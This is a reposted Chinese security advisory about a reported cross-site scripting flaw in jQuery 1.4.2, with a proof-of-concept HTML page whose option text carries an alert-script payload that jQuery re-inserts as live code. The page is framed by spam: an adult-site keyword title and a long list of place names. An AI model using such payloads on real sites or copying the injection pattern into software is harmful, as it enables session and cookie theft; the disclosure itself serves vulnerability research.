91超碰碰碰碰久久久久久综合_超碰av人澡人澡人澡人澡人掠_国产黄大片在线观看画质优化_txt小说免费全本

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

JQuery 1.4.2 'index.html'跨站腳本漏洞

發布時間:2020-10-03 14:31:53 來源:網絡 閱讀:2572 作者:zhpfxl 欄目:web開發

XSS Reflected JQuery 1.4.2 - Create object option in runtime client-side


影響版本:

    JQuery-1.4.2

危害:

    JQuery 'index.html'不正確過濾用戶提交的輸入,遠程***者可以利用漏洞構建惡意URI,誘使用戶解析,可獲得敏感Cookie,劫持會話或在客戶端上進行惡意操作。
 

測試:

啟動nginx,并創建文件jquery-xss-reflected.com.br.html,內容為:

<!DOCTYPE html>

<! -- Mauro Risonho de Paula Assumpcao -->

<! -- aka firebits mauro.risonho () gmail com -->

<! -- Exploit jQuery JavaScript Library v1.4.2 -->

<! -- 01.09.2014 18:07:14 SaoPaulo/Brazil                            -->

<! --   _____.__              ___.   .__  __

-->

<! -- _/ ____\__|______   ____\_ |__ |__|/  |_  ______                -->

<! -- \   __\|  \_  __ \_/ __ \| __ \|  \   __\/  ___/                -->

<! -- |  |  |  ||  | \/\  ___/| \_\ \  ||  |  \___ \                 -->

<! -- |__|  |__||__|    \___  |___  /__||__| /____  |                -->

<! --                        \/    \/             \/                 -->

<! -- bits on fire - 1989-2014 - brazil                             -->

<! --                                                                 -->

<! -- * jQuery JavaScript Library v1.4.2                            -->

<! -- * http://jquery.com/                                            -->

<! -- *                                                                -->

<! -- * Copyright 2010, John Resig                                    -->

<! -- * Dual licensed under the MIT or GPL Version 2 licenses.        -->

<! -- * http://jquery.org/license                                    -->

<! -- *                                                                -->

<! -- * Includes Sizzle.js                                            -->

<! -- * http://sizzlejs.com/                                        -->

<! -- * Copyright 2010, The Dojo Foundation

-->

<! -- * Released under the MIT, BSD, and GPL Licenses.                -->

<! -- *                                                                -->

<! -- * Date: Sat Feb 13 22:33:48 2010 -0500                        -->

<! -- */                                                            -->


<html>

<head>

  <meta charset="utf-8">

  <title>XSS Reflected - Jquery 1.4.2 </title>

  <script src="https://code.jquery.com/jquery-1.4.2.js"></script>

  <script>

    $(function() {

      $('#users').each(function() {

        var select = $(this);

        var option = select.children('option').first();

        select.after(option.text());

        select.hide();

      });

    });

  </script>

</head>



<body>

  <form method="post">

    <p>

      <select id="users" name="users">

        <option value="x***eflected">&lt;script&gt;alert(&#x27;x***eflected - jquery 1.4.2 by - 01.09.2014 18:07:14 Sao Paulo/Brazil@firebitsbr - mauro.risonho () gmail com&#x27;);&lt;/script&gt;</option>

      </select>

    </p>

  </form>

</body>

</html>

訪問地址:

http://localhost/jquery-xss-reflected.com.br.html

測試截圖:

JQuery 1.4.2 'index.html'跨站腳本漏洞


相關連接地址:

http://seclists.org/fulldisclosure/2014/Sep/10

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

桐庐县| 盐边县| 多伦县| 洛阳市| 招远市| 太原市| 绥德县| 荣成市| 灵寿县| 肥城市| 斗六市| 安化县| 伊吾县| 松潘县| 都兰县| 仙居县| 渝中区| 将乐县| 株洲市| 张掖市| 岗巴县| 玉门市| 大邑县| 龙州县| 安宁市| 新邵县| 铁力市| 泰顺县| 宁强县| 竹山县| 大同市| 隆安县| 龙海市| 神池县| 达孜县| 木兰县| 普安县| 双城市| 田林县| 丽江市| 共和县|